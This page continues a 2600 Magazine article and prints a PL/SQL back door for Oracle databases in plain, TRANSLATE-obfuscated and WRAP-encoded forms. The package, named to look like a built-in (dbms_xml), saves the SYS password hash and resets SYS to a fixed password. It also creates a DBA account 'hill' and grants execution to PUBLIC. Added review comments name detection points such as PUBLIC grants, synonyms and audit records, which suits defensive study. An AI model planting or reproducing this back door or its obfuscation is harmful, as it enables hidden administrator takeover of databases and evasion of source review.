Continued from 2600 Magazine - A Back Door To Your Oracle Database
Part 2: Obfuscation of the String Literals then Wrapping the Code
Below is a listing of the code of DBMS_XML as it appears in the 2600 Magazine article:
-- Listing as printed in the article, annotated for review.
-- The package name resembles Oracle's built-in DBMS_* packages, and the spec
-- exposes one procedure, parse, which acts on four command strings.
-- Review notes:
--   * There is no AUTHID clause, so the body runs with the rights of the schema
--     that owns it (the PL/SQL default). The owning schema is not shown on this page.
--   * The two statements after the body make the procedure callable by every account.
--   * Things to look for: EXECUTE granted to PUBLIC on a package that is not
--     Oracle-supplied (DBA_TAB_PRIVS), a PUBLIC synonym pointing at an unexpected
--     owner (DBA_SYNONYMS), and audit records for ALTER USER SYS, CREATE USER,
--     DROP USER and GRANT DBA.
CREATE OR REPLACE PACKAGE dbms_xml AS
   PROCEDURE parse (string IN VARCHAR2);
END dbms_xml;
/

CREATE OR REPLACE PACKAGE BODY dbms_xml AS
   PROCEDURE parse (string IN VARCHAR2) IS
      -- Holds the SYS password value read from dba_users, or read back from syspa1.
      var1 VARCHAR2 (100);
   BEGIN
      -- 'unlock': copy the stored SYS password value into a new table, syspa1,
      -- then replace the SYS password with a fixed one.
      -- Observable side effects: a new table SYSPA1 in the owner's schema and an
      -- ALTER USER on SYS.
      IF string = 'unlock' THEN
         SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
         EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
         EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
         COMMIT;
         EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY hack11hack';
      END IF;

      -- 'lock': put the saved value back with IDENTIFIED BY VALUES and drop the
      -- table, so the original SYS password works again and SYSPA1 is gone.
      -- The audit trail, if enabled, still shows two ALTER USER events on SYS.
      IF string = 'lock' THEN
         EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
         EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
         EXECUTE IMMEDIATE 'DROP TABLE syspa1';
      END IF;

      -- 'make': create the account HILL and grant it the DBA role.
      IF string = 'make' THEN
         EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY hack11hack';
         EXECUTE IMMEDIATE 'GRANT DBA TO hill';
      END IF;

      -- 'unmake': drop HILL together with any objects it owns.
      IF string = 'unmake' THEN
         EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
      END IF;
   END;
END dbms_xml;
/

-- Publish the package under a public name and let any account execute it.
CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;
GRANT EXECUTE ON dbms_xml TO PUBLIC;
The code below demonstrates how to obfuscate the text strings using the translate function:
-- Same package as the plain listing above, with each SQL statement stored as a
-- TRANSLATE-encoded literal and decoded by the local function conv at run time.
-- Review notes:
--   * A keyword search of stored source (for example DBA_SOURCE) for ALTER USER,
--     CREATE USER or GRANT DBA finds nothing here. The statements exist in clear
--     text only when they run, so auditing of those actions still records them.
--   * Source-level indicators that remain: EXECUTE IMMEDIATE fed by a function
--     call instead of a literal, and TRANSLATE called with two long fixed alphabets.
--   * The wrapped form further down this page still shows the command strings,
--     the encoded literals and both TRANSLATE alphabets in clear text, so string
--     inspection of source wrapped in that format remains possible.
--   * The command strings ('unlock', 'lock', 'make', 'unmake') are not encoded.
CREATE OR REPLACE PACKAGE dbms_xml AS
   PROCEDURE parse (STRING IN VARCHAR2);
END dbms_xml;
/

CREATE OR REPLACE PACKAGE BODY dbms_xml AS
   PROCEDURE parse (STRING IN VARCHAR2) IS
      -- Holds the value read by the first statement of 'unlock' / 'lock'; in
      -- 'unlock' it is later reused for a decoded statement.
      var1 VARCHAR2 (100);

      /* ------- sub function begin ------- */
      -- conv: character-for-character substitution of its input using two fixed
      -- alphabets; returns the decoded text.
      FUNCTION conv (input IN VARCHAR2) RETURN VARCHAR2 IS
         x VARCHAR2 (300);
      BEGIN
         x := TRANSLATE (input,
                         'ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 ',
                         ' 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
                        );
         RETURN x;
      EXCEPTION
         -- Any error inside conv is swallowed and NULL is returned to the caller.
         WHEN OTHERS THEN
            RETURN NULL;
      END conv;
      /* ------- sub function end ------- */

   BEGIN
      -- Each conv('...') argument below appears to be the encoded form of the
      -- corresponding statement in the plain listing; the branch structure is
      -- the same.
      IF STRING = 'unlock' THEN
         EXECUTE IMMEDIATE conv ('7kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z''717''') INTO var1;
         EXECUTE IMMEDIATE conv ('NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP))');
         EXECUTE IMMEDIATE conv ('GBwKxvZGBvAZwqwzOYZtODuKwZ(''') || var1 || ''')';
         COMMIT;
         -- var1 is reused to hold a decoded statement before it is executed.
         var1:= conv ('od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE');
         EXECUTE IMMEDIATE var1;
      END IF;

      IF STRING = 'lock' THEN
         EXECUTE IMMEDIATE conv ('7kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y') INTO var1;
         EXECUTE IMMEDIATE conv ('od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z''') || var1 || '''';
         EXECUTE IMMEDIATE conv ('l8a0Z6ondkZwqwzOY');
      END IF;

      IF STRING = 'make' THEN
         EXECUTE IMMEDIATE conv ('m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE');
         EXECUTE IMMEDIATE conv ('i8ob6ZlnoZ6aZHGDD');
      END IF;

      IF STRING = 'unmake' THEN
         EXECUTE IMMEDIATE conv ('l8a0Z57k8ZHGDDZmo7molk');
      END IF;
   END;
END dbms_xml;
/

-- NOTE(review): the synonym here is named dbms_sql, while the other two
-- listings on this page name it dbms_xml; this looks like a transcription
-- difference between the listings.
create public synonym dbms_sql for dbms_xml;
grant execute on dbms_xml to public;
The code below has has been modified by the WRAP utility. Now, it is very difficult to understand it, and impossible to edit it.
CREATE OR REPLACE PACKAGE dbms_xml wrapped 0 abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd 3 9 9000000 1 4 0 5 2 :e: 1PACKAGE: 1DBMS_XML: 1PARSE: 1STRING: 1VARCHAR2: 0 0 0 13 2 0 a0 97 9a 8f a0 b0 3d b4 55 6a a0 :2 aa 59 58 1d 17 b5 13 2 0 3 7 11 2d 29 28 35 25 3a 3e 42 46 48 4a 4d 50 51 5a 13 2 0 1 9 e 15 1f :2 15 14 :2 4 5 :7 1 13 4 0 :2 1 :8 3 4 :7 1 5c 4 :3 0 1 :3 0 2 :6 0 1 :2 0 3 :a 0 a 2 :7 0 5 :2 0 3 5 :3 0 4 :7 0 6 5 :3 0 8 :2 0 a 3 9 0 c 2 :3 0 7 e 0 e c d f 2 e 11 0 10 f 12 :8 0 9 4 :3 0 1 4 1 7 1 a 1 4 0 11 0 1 14 2 3 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2 0 1 3 1 2 4 2 0 0 / CREATE OR REPLACE PACKAGE BODY dbms_xml wrapped 0 abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd abcd 3 b 9000000 1 4 0 27 2 :e: 1PACKAGE: 1BODY: 1DBMS_XML: 1PARSE: 1STRING: 1VARCHAR2: 1VAR1: 1100: 1FUNCTION: 1CONV: 1INPUT: 1RETURN: 1X: 1300: 1TRANSLATE: 1ZYXWVUTSRQPOMNLKJIHGFEDCBAzyxwvutsrqponmlkjihgfedcba0987654321 : 1 1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ: 1OTHERS: 1=: 1unlock: 1EXECUTE: 1IMMEDIATE: 17kdkm6Z0o773a8lZj8acZLMO_uwKxwZ3hk8kZuwKxBOCKZ=Z'717': 1NxKOvKZvOMDKZwqwzOYZ(NADYZtOxNHOxX(YPP)): 1GBwKxvZGBvAZwqwzOYZtODuKwZ(': 1||: 1'): 1COMMIT: 1od6k8Z57k8Z717Zglkb6gjgklZn1ZHONEYYHONE: 1lock: 17kdkm6ZNADYZj8acZwqwzOYZ3hk8kZ8a3b5c=Y: 1od6k8Z57k8Z717Zglkb6gjgklZn1Z4od5k7Z': 1': 1l8a0Z6ondkZwqwzOY: 1make: 1m8ko6kZ57k8ZHGDDZglkb6gjgklZn1ZHONEYYHONE: 1i8ob6ZlnoZ6aZHGDD: 1unmake: 1l8a0Z57k8ZHGDDZmo7molk: 0 0 0 da 2 0 :2 a0 97 9a 8f a0 b0 3d b4 55 6a a3 a0 51 a5 1c 81 b0 a0 8d 8f a0 b0 3d b4 :2 a0 2c 6a a3 a0 51 a5 1c 81 b0 :3 a0 :2 6e a5 b d :2 a0 65 b7 a0 53 a0 4d 65 b7 a6 9 a4 a0 b1 11 68 4f a0 7e 6e b4 2e :3 a0 6e a5 b a0 11e 11d :3 a0 6e a5 b 11e 11d :3 a0 6e a5 b 7e a0 b4 2e 7e 6e b4 2e 11e 11d a0 57 a0 b4 e9 :2 a0 6e a5 b d :3 a0 11e 11d b7 19 3c a0 7e 6e b4 2e :3 a0 6e a5 b a0 11e 11d :3 a0 6e a5 b 7e a0 b4 2e 7e 6e b4 2e 11e 11d :3 a0 6e a5 b 11e 11d b7 19 3c a0 7e 6e b4 2e :3 a0 6e a5 b 11e 11d 
:3 a0 6e a5 b 11e 11d b7 19 3c a0 7e 6e b4 2e :3 a0 6e a5 b 11e 11d b7 19 3c b7 a4 b1 11 68 4f b1 b7 a4 11 a0 b1 56 4f 1d 17 b5 da 2 0 3 7 b 15 31 2d 2c 39 29 3e 42 5f 4a 4e 51 52 5a 49 66 6a 86 82 46 8e 81 93 97 9b 9f b9 a7 7e ab ac b4 a6 c0 c4 c8 cc d1 a3 d6 d8 dc e0 e4 e8 ea 1 ee f2 f3 f7 f9 fa ff 103 107 109 115 119 11b 11f 122 127 128 12d 131 135 139 13e 13f 141 145 14a 14e 152 156 15a 15f 160 162 167 16b 16f 173 177 17c 17d 17f 182 186 187 18c 18f 194 195 19a 19f 1a3 1a7 1ac 1b0 1b1 1b6 1ba 1be 1c3 1c4 1c6 1ca 1ce 1d2 1d6 1db 1df 1e1 1e5 1e8 1ec 1ef 1f4 1f5 1fa 1fe 202 206 20b 20c 20e 212 217 21b 21f 223 227 22c 22d 22f 232 236 237 23c 23f 244 245 24a 24f 253 257 25b 25f 264 265 267 26c 270 272 276 279 27d 280 285 286 28b 28f 293 297 29c 29d 29f 2a4 2a8 2ac 2b0 2b4 2b9 2ba 2bc 2c1 2c5 2c7 2cb 2ce 2d2 2d5 2da 2db 2e0 2e4 2e8 2ec 2f1 2f2 2f4 2f9 2fd 2ff 303 306 308 30c 30e 31a 31e 320 322 324 328 334 338 33a 33d 33f 340 349 da 2 0 1 9 :2 e 15 1f :2 15 14 :2 4 7 e 18 17 :2 e :2 7 10 16 1f :2 16 15 a 11 :2 7 a e 18 17 :2 e :2 a d :3 18 :2 d :2 a 11 a 7 :2 f d 14 d :3 a 7 b :4 7 a 11 13 :2 11 a 12 1c 22 :2 1c 62 :3 a 12 1c 22 :2 1c :3 a 12 1c 22 :2 1c 43 46 :2 1c 4b 4e :2 1c :7 a 4 b 11 :2 b 4 a 12 1c :2 a :3 7 a 11 13 :2 11 a 12 1c 22 :2 1c 51 :3 a 12 1c 22 :2 1c 4c 4f :2 1c 54 57 :2 1c :3 a 12 1c 22 :2 1c :2 a :3 7 a 11 13 :2 11 a 12 1c 22 :2 1c :3 a 12 1c 22 :2 1c :2 a :3 7 a 11 13 :2 11 a 12 1c 22 :2 1c :2 a :3 7 :a 4 5 :6 1 da 4 0 :3 1 :8 3 :7 5 :7 7 :2 8 :2 7 :7 a c :2 d e f :2 d c :3 11 b :2 13 :3 15 14 :2 13 12 16 :4 7 :5 19 :9 1b :8 1c :10 1d :5 1e :6 1f :5 20 1a :2 19 :5 23 :9 25 :10 26 :8 27 24 :2 23 :5 2a :8 2c :8 2d 2b :2 2a :5 30 :8 32 31 :2 30 :2 18 :8 3 35 :6 1 34b 4 :3 0 1 :3 0 2 :3 0 3 :6 0 1 :2 0 4 :a 0 cd 2 :7 0 5 :2 0 3 6 :3 0 5 :7 0 7 6 :3 0 9 :2 0 cd 4 a :2 0 b 7e 0 9 6 :3 0 8 :2 0 7 d f :6 0 12 10 0 cb 0 7 :6 0 9 :3 0 a :a 0 3d 3 :7 0 e :2 0 d 6 :3 0 b :7 0 17 16 :3 0 c :3 0 6 :3 0 19 1b 0 3d 14 1c :2 0 13 :2 0 11 6 :3 0 f 1f 21 :6 0 24 22 
0 3b 0 d :6 0 d :3 0 f :3 0 b :3 0 10 :4 0 11 :4 0 26 2a 25 2b 0 30 c :3 0 d :3 0 2e :2 0 30 17 3c 12 :3 0 c :4 0 34 :2 0 36 1a 38 1c 37 36 :2 0 39 1e :2 0 3c a :3 0 20 3c 3b 30 39 :6 0 3d 2 0 14 1c 3c cb :2 0 5 :3 0 13 :2 0 14 :4 0 24 40 42 :3 0 15 :3 0 16 :3 0 a :3 0 17 :4 0 27 46 48 7 :3 0 49 4a :3 0 4b :2 0 75 15 :3 0 16 :3 0 a :3 0 18 :4 0 29 4f 51 52 :4 0 53 :2 0 75 15 :3 0 16 :3 0 a :3 0 19 :4 0 2b 57 59 1a :2 0 7 :3 0 2d 5b 5d :3 0 1a :2 0 1b :4 0 30 5f 61 :3 0 62 :4 0 63 :2 0 75 1c :3 0 67 68 :2 0 69 1c :5 0 66 :2 0 75 7 :3 0 a :3 0 1d :4 0 33 6b 6d 6a 6e 0 75 15 :3 0 16 :3 0 7 :3 0 72 :4 0 73 :2 0 75 35 76 43 75 0 77 3c 0 c9 5 :3 0 13 :2 0 1e :4 0 40 79 7b :3 0 15 :3 0 16 :3 0 a :3 0 1f :4 0 43 7f 81 7 :3 0 82 83 :3 0 84 :2 0 9e 15 :3 0 16 :3 0 a :3 0 20 :4 0 45 88 8a 1a :2 0 7 :3 0 47 8c 8e :3 0 1a :2 0 21 :4 0 4a 90 92 :3 0 93 :4 0 94 :2 0 9e 15 :3 0 16 :3 0 a :3 0 22 :4 0 4d 98 9a 9b :4 0 9c :2 0 9e 4f 9f 7c 9e 0 a0 53 0 c9 5 :3 0 13 :2 0 23 :4 0 57 a2 a4 :3 0 15 :3 0 16 :3 0 a :3 0 24 :4 0 5a a8 aa ab :4 0 ac :2 0 b6 15 :3 0 16 :3 0 a :3 0 25 :4 0 5c b0 b2 b3 :4 0 b4 :2 0 b6 5e b7 a5 b6 0 b8 61 0 c9 5 :3 0 13 :2 0 26 :4 0 65 ba bc :3 0 15 :3 0 16 :3 0 a :3 0 27 :4 0 68 c0 c2 c3 :4 0 c4 :2 0 c6 6a c7 bd c6 0 c8 6c 0 c9 6e cc :3 0 cc 73 cc cb c9 ca :6 0 cd 1 0 4 a cc d4 :3 0 d2 0 d2 :3 0 d2 d4 d0 d1 :6 0 d5 :2 0 3 :3 0 76 0 3 d2 d8 :3 0 d7 d5 d9 :8 0 78 4 :3 0 1 5 1 8 1 e 1 c 1 15 1 18 1 20 1 1e 3 27 28 29 2 2c 2f 1 35 1 32 1 38 1 23 1 41 2 3f 41 1 47 1 50 1 58 2 5a 5c 2 5e 60 1 6c 6 4c 54 64 69 6f 74 1 76 1 7a 2 78 7a 1 80 1 89 2 8b 8d 2 8f 91 1 99 3 85 95 9d 1 9f 1 a3 2 a1 a3 1 a9 1 b1 2 ad b5 1 b7 1 bb 2 b9 bb 1 c1 1 c5 1 c7 4 77 a0 b8 c8 2 11 3d 1 cd 1 4 0 d8 0 1 14 3 7 0 1 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 c 2 0 3 0 1 4 1 2 15 3 0 5 2 0 1e 3 0 14 2 3 0 / create public synonym dbms_xml for dbms_xml; grant execute on dbms_xml to public;